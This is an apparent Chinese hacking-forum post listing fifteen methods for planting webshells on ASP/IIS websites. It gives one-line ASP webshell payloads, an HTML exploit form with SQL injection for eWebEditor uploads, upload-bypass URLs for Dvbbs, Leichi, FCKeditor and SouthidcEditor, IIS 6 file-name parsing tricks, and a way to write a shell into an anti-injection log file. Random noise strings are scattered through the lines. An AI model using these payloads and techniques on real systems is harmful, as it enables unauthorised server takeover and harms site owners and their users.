 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
- n! b1 V& D4 R8 ]
% o1 J& H$ M& V2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
1 H! c4 g+ k+ Y" c9 F1 N7 m5 C+ y C( m
3.上传漏洞:
. l/ y* N+ [0 x# _" h$ B0 Q! Z7 e) {! a
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00& O1 D% _1 g' P. C9 M; a3 z* ^
$ b# Z1 j1 H/ M1 c& x
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件6 h- A* {( c$ M% n
& @$ }$ Q8 x- v
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp; K7 h. X% Q! S% m* r: b. H$ ~% @0 h3 M
然后在上传文件里面填要传的图片格式的ASP木马3 _" J, t3 M5 n% x: j+ f
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp; s- g) b, w$ \ {
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
5 I. D- H* P+ C, r- `: |% s( t% H' g
<html>
3 o8 R; \ s9 K* o2 C% B<head>4 i) |" _) @4 R* A; F
<title>ewebeditor upload.asp上传利用</title>
1 p n, }, j+ c- T$ i</head>
& }! X$ P* d1 k+ @" u7 e Q<body>
' k" @/ U k5 b0 v5 e2 V<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">7 p- M3 I5 {6 e3 e/ }
<input type=file name=uploadfile size=100><br><br>% h- J% k: Z. W9 y
<input type=submit value=Fuck> Z- I8 ~3 F9 Q5 }& `
</form>
$ ?5 p8 o0 ? U. v$ Z' p' M</body>
3 U+ f2 Q' I6 m" [6 G</form>
8 ]8 z( R/ W5 u; d1 b7 _</html>
. F' V+ w# f, ^% _' X6 D) b& I# ?- n' s# a
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
" ]0 a' H1 ^; [5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
7 q7 ~0 ~* Q1 {2 T* a5 ]9 C8 }( d, e. d$ y
利用windows2003解析。建立zjq.asp的文件夹
) c$ h2 T0 u4 z! z' o" o0 }
1 h! c: F4 P$ n P& s9 e: q6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型. g9 F& c+ Z8 e7 S
* Q$ h- H1 }9 i4 F1 s; S$ r/ @7.cuteeditor:类似ewebeditor m4 N, S3 c I+ x- @
- N3 t/ y0 ^3 G0 X, z# `
8.htmleditor:同上- c- B: s1 Y1 y; j8 m, O( n
2 y' U: q3 y0 w6 B5 X) W# b9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破+ V2 S m) T4 `2 D d
& ]+ H H7 F. F! Q5 S' W+ A. S
<%execute request("value")%><%'<% loop <%:%>
* l e+ Z2 e0 k2 _& t: z- d' p% t$ O6 k8 D* h ?# m0 g
<%'<% loop <%:%><%execute request("value")%>2 I/ w. R( V- p2 W! O' ^
5 S: K/ v7 a4 f% t
<%execute request("value")'<% loop <%:%>/ r( G0 d Z2 o5 H' t3 Z
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
/ X% x" p2 N8 X' x& d8 n. h$ d K% M
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
Y" H( P6 }. t: R2 H* b7 y- N! p( ?* K& _* t! n
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3: ^3 V% V) p( o9 x
9 O9 O M4 F: O& S
解析漏洞得到webshell
+ o8 l/ z _: o0 W: h# J$ W" ?2 [! n/ F) d
12.mssql差异备份,日志备份,前提需知道web路径7 K4 U2 ^ R0 ^, O, ?
- Z. p7 Q8 ^; F13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell: F8 v6 i4 P0 n4 P/ r
8 ]9 F" T% t$ Y) q6 y+ \: ]14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
9 L) x8 Z6 i2 W+ b& \# k& j# U/ L9 p, s" w; @# ]% B$ J# O
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
8 `# C3 A2 m; I1 H- i, w: Q/ r9 d. l- Z
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
/ L( H* o) F$ t& w不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|